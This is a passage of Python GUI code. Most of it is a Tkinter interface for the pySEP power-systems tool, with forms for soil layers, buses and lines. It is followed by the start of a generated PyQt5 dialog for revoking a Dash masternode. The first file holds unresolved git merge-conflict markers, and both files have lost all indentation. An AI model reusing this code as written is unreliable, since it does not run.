# BOTÃO ADICIONAR BRITA
def __add_butt():
profundidade = float(entry_brita_profundidade.get())
print('\n\nprofundidade = ', profundidade)
resistividade = float(entry_brita_resistividade.get())
print('\n\nresistividade = ', resistividade)
self.__malha.add_info_brita(profundidade=profundidade,
resistividade=resistividade)
self.__malha.show_solo()
set_color_solo(profundidade=profundidade, num_camada=0, resistividade=resistividade, nome="Brita")
butt_add_brita = tk.Button(
master=frame_config,
text="Adicionar informações da camada de Brita!", font=("Helvetica", 12), height=1, # width=10,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_brita.grid(row=2, column=8, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Solo n
label_solo = tk.Label(
master=frame_config,
text="Adicionar nova camada de solo: ",
font=("Helvetica", 20),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_solo.grid(row=3, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Solo PROFUNDIDADE
label_solo_profundidade = tk.Label(
master=frame_config,
text="Profundidade [m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_solo_profundidade.grid(row=4, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Solo PROFUNDIDADE
entry_solo_profundidade = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_solo_profundidade.grid(row=4, column=2, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Solo RESISTIVIDADE
label_solo_resistividade = tk.Label(
master=frame_config,
text="Resistividade [Ohm.m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_solo_resistividade.grid(row=4, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Solo RESISTIVIDADE
entry_solo_resistividade = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_solo_resistividade.grid(row=4, column=6, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# BOTÃO ADICIONAR BRITA
def __add_butt():
self.__malha.set_num_solo()
num_camada = self.__malha.get_num_solo()
profundidade = float(entry_solo_profundidade.get())
print('\n\nprofundidade = ', profundidade)
resistividade = float(entry_solo_resistividade.get())
print('\n\nresistividade = ', resistividade)
self.__malha.add_info_solo(num_camada=num_camada,
profundidade=profundidade,
resistividade=resistividade)
self.__malha.show_solo()
set_color_solo(profundidade=profundidade, num_camada=num_camada, resistividade=resistividade,
nome="H" + str(num_camada))
frame_solos = tk.Frame(
master=frame_config,
bg="light goldenrod",
)
frame_solos.grid(row=5, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
def set_color_solo(profundidade, resistividade, num_camada, nome):
cores = ["white", "brown", "red", "yellow", "blue", "black", "green"]
frame = tk.LabelFrame(
master=frame_solos,
width=1050,
height=profundidade * 150,
bg=cores[num_camada],
text="\t\tNome: " + str(nome) + "\t\tProfundidade: " + str(
profundidade) + " [m]\t\tResistividade: " + str(resistividade) + " [Ohm.m]",
font=("Helvetica", 12),
)
frame.pack(fill=tk.BOTH, expand=True)
butt_add_solo = tk.Button(
master=frame_config,
text="Adicionar informações da camada de Solo!", font=("Helvetica", 12), height=1, # width=10,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_solo.grid(row=4, column=8, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
def __add_bar(self, event):
self.__config_bar()
self.__text_status.set("Adicionando uma nova barra! ")
def __s_base(self):
s_base = tk.Toplevel(master=self.__janela)
s_base.title("\tBem-vindo ao pySEP!!\t")
s_base.geometry("500x175+500+500")
s_base.wm_iconbitmap("images/logo_pySEP.ico")
s_base["bg"] = "light goldenrod"
label_s_base = tk.Label(
master=s_base,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Defina um valor base para o sistema em [VA]!\nInserir conforme exemplo: 100e6",
font=("Helvetica", 18)
)
label_s_base.grid(row=0, columnspan=3, padx=5, pady=5)
frame_s_base = tk.Entry(
font=("Helvetica", 15),
master=s_base,
justify=tk.CENTER, width=30,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
frame_s_base.focus_set()
frame_s_base.grid(row=1, columnspan=3, padx=5, pady=5)
def __s_base_butt():
self.__info_basic['sBase'] = float(frame_s_base.get())
self.__circuito.set_s_base(sBase=float(frame_s_base.get()))
print('Sbase = ', float(frame_s_base.get()))
s_base.destroy()
button_s_base = tk.Button(
master=s_base,
text="Vamos lá!", font=("Helvetica", 12), width=10,
bg="goldenrod",
bd=3,
command=__s_base_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
)
button_s_base.grid(row=2, columnspan=3, padx=5, pady=5)
def __erro(self, mensagem):
erro = tk.Toplevel()
erro.title("\tERRO!!\t")
erro.geometry("400x250")
erro.wm_iconbitmap("images/logo_pySEP.ico")
erro["bg"] = "red"
label_erro = tk.Label(
master=erro,
anchor=tk.CENTER,
bg="red",
justify=tk.CENTER,
padx=2,
pady=2,
text=mensagem,
font=("Helvetica", 20)
)
label_erro.pack(fill='both', expand=True)
def __config_bar(self):
config_bar = tk.Toplevel()
config_bar.title("Configurações da barra " + str(self.__info_basic['nums'].get('barras')))
config_bar.geometry("1000x275")
config_bar.wm_iconbitmap("images/logo_pySEP.ico")
config_bar["bg"] = "light goldenrod"
frame_config = tk.Frame(
master=config_bar,
bg="light goldenrod"
)
frame_config.pack(fill='both', expand=True)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_config,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Configurações da barra " + str(self.__info_basic['nums'].get('barras')),
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=6, padx=5, pady=5)
# NÚMERO DA BARRA
label_num_barra = tk.Label(
master=frame_config,
text="Número da barra: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_num_barra.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W)
entry_num_barra = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_num_barra.focus_set()
entry_num_barra.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W)
##############################################################################
label_div_1 = tk.Label(
master=frame_config,
text=" ||| ",
font=("Helvetica", 12),
justify=tk.CENTER,
bg="light goldenrod",
)
label_div_1.grid(row=1, column=2, padx=5, pady=5)
##############################################################################
# TIPO DA BARRA
__tipo_bar = tk.StringVar()
_tipo1_barra = tk.Radiobutton(
master=frame_config,
text="REF",
variable=__tipo_bar,
value="1",
bg="light goldenrod",
command=__tipo_bar.set("1")
)
_tipo1_barra.grid(row=1, column=3, sticky=tk.W)
_tipo2_barra = tk.Radiobutton(
master=frame_config,
text="PQ",
variable=__tipo_bar,
value="2",
bg="light goldenrod",
command=__tipo_bar.set("2")
)
_tipo2_barra.grid(row=1, column=4, sticky=tk.W)
_tipo3_barra = tk.Radiobutton(
master=frame_config,
text="PV",
variable=__tipo_bar,
value="3",
bg="light goldenrod",
command=__tipo_bar.set("3")
)
_tipo3_barra.grid(row=1, column=5, sticky=tk.W)
##############################################################################
label_div_2 = tk.Label(
master=frame_config,
text=" ||| ",
font=("Helvetica", 12),
justify=tk.CENTER,
bg="light goldenrod",
)
label_div_2.grid(row=2, column=2, padx=5, pady=5)
##############################################################################
# TENSÃO DA BARRA
label_tensao_barra = tk.Label(
master=frame_config,
text="Tensão da barra [pu]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_tensao_barra.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W)
entry_tensao_barra = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_tensao_barra.grid(row=2, column=1, padx=5, pady=5, sticky=tk.W)
# ÂNGULO DA BARRA
label_ang_barra = tk.Label(
master=frame_config,
text="Ângulo da tensão \ndesta barra [graus]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_ang_barra.grid(row=2, column=3, padx=5, pady=5, sticky=tk.W)
entry_ang_barra = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_ang_barra.grid(row=2, column=4, padx=5, pady=5, sticky=tk.W)
# CARGA DA BARRA
label_carga_barra = tk.Label(
master=frame_config,
text="Carga desta barra (P+Qj)\nex.:100e6+50e6 [VA]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_carga_barra.grid(row=3, column=0, padx=5, pady=5, sticky=tk.W)
entry_carga_barra = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_carga_barra.grid(row=3, column=1, padx=5, pady=5, sticky=tk.W)
##############################################################################
label_div_3 = tk.Label(
master=frame_config,
text=" ||| ",
font=("Helvetica", 12),
justify=tk.CENTER,
bg="light goldenrod",
)
label_div_3.grid(row=3, column=2, padx=5, pady=5)
##############################################################################
# GERAÇÃO DA BARRA
label_geracao_barra = tk.Label(
master=frame_config,
text="Geração desta barra (P+Qj)\nex.:100e6+50e6 [VA]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_geracao_barra.grid(row=3, column=3, padx=5, pady=5, sticky=tk.W)
entry_geracao_barra = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_geracao_barra.grid(row=3, column=4, padx=5, pady=5, sticky=tk.W)
# BOTÃO ADICIONAR
def __add_butt():
num_bar = int(entry_num_barra.get())
print('\n\nnum bar = ', num_bar)
tp_bar = int(__tipo_bar.get())
print('tipo barra = ', tp_bar)
tensao_bar = float(entry_tensao_barra.get())
print('tensao bar = ', tensao_bar)
ang_bar = float(entry_ang_barra.get())
print('ang bar = ', ang_bar)
carga_bar = str(entry_carga_barra.get())
print('carga bar = ', carga_bar)
geracao_bar = str(entry_geracao_barra.get())
print('geracao bar = ', geracao_bar)
if not carga_bar.__contains__("+") and not carga_bar.__contains__("-"):
self.__erro(mensagem="INSERIR A CARGA NO FORMATO: \n P + Q OU P - Q !")
elif not geracao_bar.__contains__("+") and not geracao_bar.__contains__("-"):
self.__erro(mensagem="INSERIR A CARGA NO FORMATO: \n P + Q OU P - Q !")
else:
carga = list()
geracao = list()
if carga_bar.__contains__("+"):
carga = carga_bar.split("+")
carga = list(map(float, carga))
carga[1] *= 1j
carga = carga[0] + carga[1]
elif carga_bar.__contains__("-"):
carga = carga_bar.split("-")
carga = list(map(float, carga))
carga[1] *= 1j
carga = carga[0] + carga[1]
if geracao_bar.__contains__("+"):
geracao = geracao_bar.split("+")
geracao = list(map(float, geracao))
geracao[1] *= 1j
geracao = geracao[0] + geracao[1]
elif geracao_bar.__contains__("-"):
geracao = geracao_bar.split("-")
geracao = list(map(float, geracao))
geracao[1] *= 1j
geracao = geracao[0] + geracao[1]
self.__circuito.addBarra(
barra=num_bar,
code=tp_bar,
tensao=tensao_bar,
ang=ang_bar,
carga=carga,
geracao=geracao)
print("\n\nBarra ", self.__info_basic['nums'].get('barras'), " adicionada! ")
self.__circuito.showBarras()
self.__info_basic['nums']['barras'] += 1
<<<<<<< HEAD
self.__show_grafo()
=======
self.__grafo_add_node(list_numBar=self.__circuito.getBarras())
self.__label_logo.destroy()
>>>>>>> 61cee31 (logo adicionada)
config_bar.destroy()
butt_add = tk.Button(
master=frame_config,
text="Adicionar", font=("Helvetica", 12), height=2, width=30,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add.grid(row=4, columnspan=5, padx=5, pady=5)
def __config_lin(self):
config_lin = tk.Toplevel()
config_lin.title("Configurações de linha ")
config_lin.geometry("815x275")
config_lin.wm_iconbitmap("images/logo_pySEP.ico")
config_lin["bg"] = "light goldenrod"
frame_config = tk.LabelFrame(
master=config_lin,
bg="light goldenrod"
)
frame_config.pack(fill='both', expand=True)
# TÍTULO DA JANELA
label_titulo = tk.Label(
master=frame_config,
anchor=tk.CENTER,
bg="light goldenrod",
justify=tk.CENTER,
padx=2,
pady=2,
text="Configurações da " + str(self.__info_basic['nums'].get('linhas')) + " ª linha.",
font=("Helvetica", 20)
)
label_titulo.grid(row=0, columnspan=5, padx=5, pady=5)
# NÚMERO DA BARRA 1
label_num_barra1 = tk.Label(
master=frame_config,
text="Número da barra \nde origem: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_num_barra1.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W)
entry_num_barra1 = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_num_barra1.focus_set()
entry_num_barra1.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W)
##############################################################################
label_div_1 = tk.Label(
master=frame_config,
text=" ||| ",
font=("Helvetica", 12),
justify=tk.CENTER,
bg="light goldenrod",
)
label_div_1.grid(row=1, column=2, padx=5, pady=5)
##############################################################################
# NÚMERO DA BARRA 2
label_num_barra2 = tk.Label(
master=frame_config,
text="Número da barra \nde destino: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_num_barra2.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W)
entry_num_barra2 = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_num_barra2.focus_set()
entry_num_barra2.grid(row=1, column=4, padx=5, pady=5, sticky=tk.W)
# IMPEDÂNCIA DA LINHA
label_imp_linha = tk.Label(
master=frame_config,
text="Impedância da linha [pu]: \nExemplo: 0.1 + 0.2 ",
font=("Helvetica", 14),
justify=tk.CENTER,
anchor=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_imp_linha.grid(row=2, columnspan=5, padx=5, pady=5)
entry_imp_linha = tk.Entry(
font=("Helvetica", 15),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE,
width=40,
)
entry_imp_linha.grid(row=3, columnspan=5, padx=5, pady=5)
# BOTÃO ADICIONAR
def __add_butt():
num_bar1 = int(entry_num_barra1.get())
print('\n\nnum bar1 = ', num_bar1)
num_bar2 = int(entry_num_barra2.get())
print('num bar2 = ', num_bar2)
z_linha = str(entry_imp_linha.get())
print('impedância = ', z_linha)
if not z_linha.__contains__("+") and not z_linha.__contains__("-"):
self.__erro(mensagem="INSERIR A IMPEDÂNCIA NO FORMATO: \n r + x OU r - x !")
else:
z = list()
if z_linha.__contains__("+"):
z = z_linha.split("+")
z = list(map(float, z))
z[1] *= 1j
z = z[0] + z[1]
elif z_linha.__contains__("-"):
z = z_linha.split("-")
z = list(map(float, z))
z[1] *= 1j
z = z[0] + z[1]
self.__circuito.addLinha(
b1=num_bar1,
b2=num_bar2,
z_ij=z)
print("\n\n", self.__info_basic['nums'].get('linhas'), "ª linha adicionada! ")
self.__circuito.showLinhas()
self.__info_basic['nums']['linhas'] += 1
self.__grafo_add_edge(list_linhas=self.__circuito.getLinhas())
self.__label_logo.destroy()
config_lin.destroy()
butt_add = tk.Button(
master=frame_config,
text="Adicionar", font=("Helvetica", 12), height=2, width=30,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add.grid(row=5, columnspan=5, padx=5, pady=5)
############################## PROTEÇÃO ########################################
# ## DESENHAR CIRCUITO DO SISTEMA :
# def __protecao_draw_ckt(self):
# config_draw_prot = tk.Toplevel()
# config_draw_prot.title("Modelagem do Circuito Considerado")
# config_draw_prot.geometry("1100x700")
# config_draw_prot.wm_iconbitmap("images/logo_pySEP.ico")
# config_draw_prot["bg"] = "light goldenrod"
#
# frame_info_draw_prot = tk.LabelFrame(
# master=config_draw_prot,
# bg="light goldenrod",
# text="Informações Preliminares",
# font=("Helvetica", 20)
# )
# frame_info_draw_prot.pack(fill='both', expand=True)
#
# # LABEL ADD Número de nós do sistema
# label_add_num_nos = tk.Label(
# master=frame_info_draw_prot,
# text="Número de Nós do Sisema: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_num_nos.grid(row=0, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_num_nos = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_draw_prot,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_num_nos.focus_set()
# entry_add_num_nos.grid(row=0, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # LABEL ADD Imalha
# label_add_imalha = tk.Label(
# master=frame_info_draw_prot,
# text="Corrente de malha [A]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_imalha.grid(row=0, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_imalha = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_imalha.grid(row=0, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# # LABEL ADD tempo protecao
# label_add_t_protecao = tk.Label(
# master=frame_info_malha,
# text="Tempo da proteção [s]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_t_protecao.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_t_protecao = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_t_protecao.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # LABEL ADD tempo defeito
# label_add_t_defeito = tk.Label(
# master=frame_info_malha,
# text="Tempo do defeito [s]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_t_defeito.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_t_defeito = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_t_defeito.grid(row=1, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # LABEL ADD temperatura ambiente
# label_add_temp_ambiente = tk.Label(
# master=frame_info_malha,
# text="Temperatura ambiente [C°]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_temp_ambiente.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_temp_ambiente = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_temp_ambiente.grid(row=2, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # LABEL ADD temperatura máxima permissível
# label_add_temp_max_permissivel = tk.Label(
# master=frame_info_malha,
# text="Temperatura máxima permissível [C°]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_temp_max_permissivel.grid(row=2, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_temp_max_permissivel = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_temp_max_permissivel.grid(row=2, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # BOTÃO ADICIONAR
# def __add_butt_salvar():
# icc = float(entry_add_icc.get())
# print('\n\nIcc = ', icc)
#
# imalha = float(entry_add_imalha.get())
# print('Imalha = ', imalha)
#
# t_prot = float(entry_add_t_protecao.get())
# print('tempo protecao = ', t_prot)
#
# t_def = float(entry_add_t_defeito.get())
# print('tempo defeito = ', t_def)
#
# temp_amb = int(entry_add_temp_ambiente.get())
# print('temperatura ambiente = ', temp_amb)
#
# temp_max = int(entry_add_temp_max_permissivel.get())
# print('temperatura maxima = ', temp_max)
#
# self.__malha.add_icc(i_cc=icc)
# self.__malha.add_i_malha(i_malha=imalha)
# self.__malha.add_t_protecao(t_protecao=t_prot)
# self.__malha.add_t_defeito(t_defeito=t_def)
# self.__malha.add_temp_ambiente(temp_ambiente=temp_amb)
# self.__malha.add_temp_max_permissivel(temp_max_permissivel=temp_max)
#
# config_info_malha.destroy()
#
# butt_add_salvar = tk.Button(
# master=frame_info_malha,
# text="Salvar!", font=("Helvetica", 12), height=2, # width=30,
# bg="goldenrod",
# bd=3,
# command=__add_butt_salvar,
# anchor=tk.CENTER,
# justify=tk.CENTER,
# compound=tk.CENTER,
# padx=2,
# pady=2,
# relief=tk.GROOVE,
# )
# butt_add_salvar.grid(row=3, columnspan=5, padx=5, pady=5)
def __add_lin(self, event):
self.__config_lin()
self.__text_status.set("Adicionando uma nova linha! ")
@staticmethod
def set_statusbar(janela_main, textvariable):
status = tk.Label(janela_main,
justify=tk.CENTER,
bd=4,
relief=tk.FLAT,
anchor=tk.W,
bg="dark goldenrod",
padx=2,
pady=2,
textvariable=textvariable)
status.pack(side=tk.BOTTOM, fill=tk.X)
@staticmethod
def set_janela(janela_main):
janela_main.title("pySEP - Python em Sistemas Elétricos de Potência!")
janela_main.geometry("1280x720+100+100")
janela_main.wm_iconbitmap("images/logo_pySEP.ico")
janela_main["bg"] = "light goldenrod"
janela_main["bd"] = 5
def bemvindo(self, event):
self.__text_status.set("Bem-vindo ao pySEP!")
|
StarcoderdataPython
|
138126
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/blogin/Projects/dash-masternode-tool/src/ui/ui_revoke_mn_dlg.ui.autosave'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_RevokeMnDlg(object):
def setupUi(self, RevokeMnDlg):
RevokeMnDlg.setObjectName("RevokeMnDlg")
RevokeMnDlg.resize(619, 257)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(RevokeMnDlg.sizePolicy().hasHeightForWidth())
RevokeMnDlg.setSizePolicy(sizePolicy)
self.verticalLayout = QtWidgets.QVBoxLayout(RevokeMnDlg)
self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetMinimumSize)
self.verticalLayout.setContentsMargins(-1, -1, -1, 0)
self.verticalLayout.setSpacing(12)
self.verticalLayout.setObjectName("verticalLayout")
self.lblDescription = QtWidgets.QLabel(RevokeMnDlg)
self.lblDescription.setWordWrap(True)
self.lblDescription.setOpenExternalLinks(True)
self.lblDescription.setObjectName("lblDescription")
self.verticalLayout.addWidget(self.lblDescription)
self.stackedWidget = QtWidgets.QStackedWidget(RevokeMnDlg)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.stackedWidget.sizePolicy().hasHeightForWidth())
self.stackedWidget.setSizePolicy(sizePolicy)
self.stackedWidget.setObjectName("stackedWidget")
self.page0 = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.page0.sizePolicy().hasHeightForWidth())
self.page0.setSizePolicy(sizePolicy)
self.page0.setObjectName("page0")
self.gridLayout = QtWidgets.QGridLayout(self.page0)
self.gridLayout.setSizeConstraint(QtWidgets.QLayout.SetMinimumSize)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setVerticalSpacing(8)
self.gridLayout.setObjectName("gridLayout")
self.layReason = QtWidgets.QHBoxLayout()
self.layReason.setSpacing(8)
self.layReason.setObjectName("layReason")
self.cboReason = QtWidgets.QComboBox(self.page0)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cboReason.sizePolicy().hasHeightForWidth())
self.cboReason.setSizePolicy(sizePolicy)
self.cboReason.setObjectName("cboReason")
self.cboReason.addItem("")
self.cboReason.addItem("")
self.cboReason.addItem("")
self.cboReason.addItem("")
self.layReason.addWidget(self.cboReason)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.layReason.addItem(spacerItem)
self.gridLayout.addLayout(self.layReason, 1, 1, 1, 1)
self.lblIP = QtWidgets.QLabel(self.page0)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.lblIP.setFont(font)
self.lblIP.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lblIP.setObjectName("lblIP")
self.gridLayout.addWidget(self.lblIP, 1, 0, 1, 1)
self.stackedWidget.addWidget(self.page0)
self.verticalLayout.addWidget(self.stackedWidget)
self.lblManualCommands = QtWidgets.QLabel(RevokeMnDlg)
self.lblManualCommands.setText("")
self.lblManualCommands.setObjectName("lblManualCommands")
self.verticalLayout.addWidget(self.lblManualCommands)
self.edtManualCommands = QtWidgets.QTextBrowser(RevokeMnDlg)
self.edtManualCommands.setOpenExternalLinks(True)
self.edtManualCommands.setOpenLinks(True)
self.edtManualCommands.setObjectName("edtManualCommands")
self.verticalLayout.addWidget(self.edtManualCommands)
self.frame = QtWidgets.QFrame(RevokeMnDlg)
self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame)
self.horizontalLayout.setContentsMargins(12, 12, 12, 12)
self.horizontalLayout.setObjectName("horizontalLayout")
self.btnCancel = QtWidgets.QPushButton(self.frame)
self.btnCancel.setAutoDefault(False)
self.btnCancel.setObjectName("btnCancel")
self.horizontalLayout.addWidget(self.btnCancel)
self.lblDocumentation = QtWidgets.QLabel(self.frame)
self.lblDocumentation.setText("")
self.lblDocumentation.setOpenExternalLinks(True)
self.lblDocumentation.setObjectName("lblDocumentation")
self.horizontalLayout.addWidget(self.lblDocumentation)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.btnSendRevokeTx = QtWidgets.QPushButton(self.frame)
self.btnSendRevokeTx.setAutoDefault(False)
self.btnSendRevokeTx.setObjectName("btnSendRevokeTx")
self.horizontalLayout.addWidget(self.btnSendRevokeTx)
self.btnClose = QtWidgets.QPushButton(self.frame)
self.btnClose.setObjectName("btnClose")
self.horizontalLayout.addWidget(self.btnClose)
self.verticalLayout.addWidget(self.frame)
self.retranslateUi(RevokeMnDlg)
self.stackedWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(RevokeMnDlg)
RevokeMnDlg.setTabOrder(self.edtManualCommands, self.btnSendRevokeTx)
RevokeMnDlg.setTabOrder(self.btnSendRevokeTx, self.btnClose)
RevokeMnDlg.setTabOrder(self.btnClose, self.btnCancel)
def retranslateUi(self, RevokeMnDlg):
_translate = QtCore.QCoreApplication.translate
RevokeMnDlg.setWindowTitle(_translate("RevokeMnDlg", "Update masternode registrar"))
self.lblDescription.setText(_translate("RevokeMnDlg", "This transaction is used by the operator to terminate service or signal the owner that a new BLS key is required (<a href=\"https://docs.dash.org/en/stable/masternodes/maintenance.html#prouprevtx\">details</a>)."))
self.cboReason.setItemText(0, _translate("RevokeMnDlg", "0: Not Specified"))
self.cboReason.setItemText(1, _translate("RevokeMnDlg", "1: Termination of Service"))
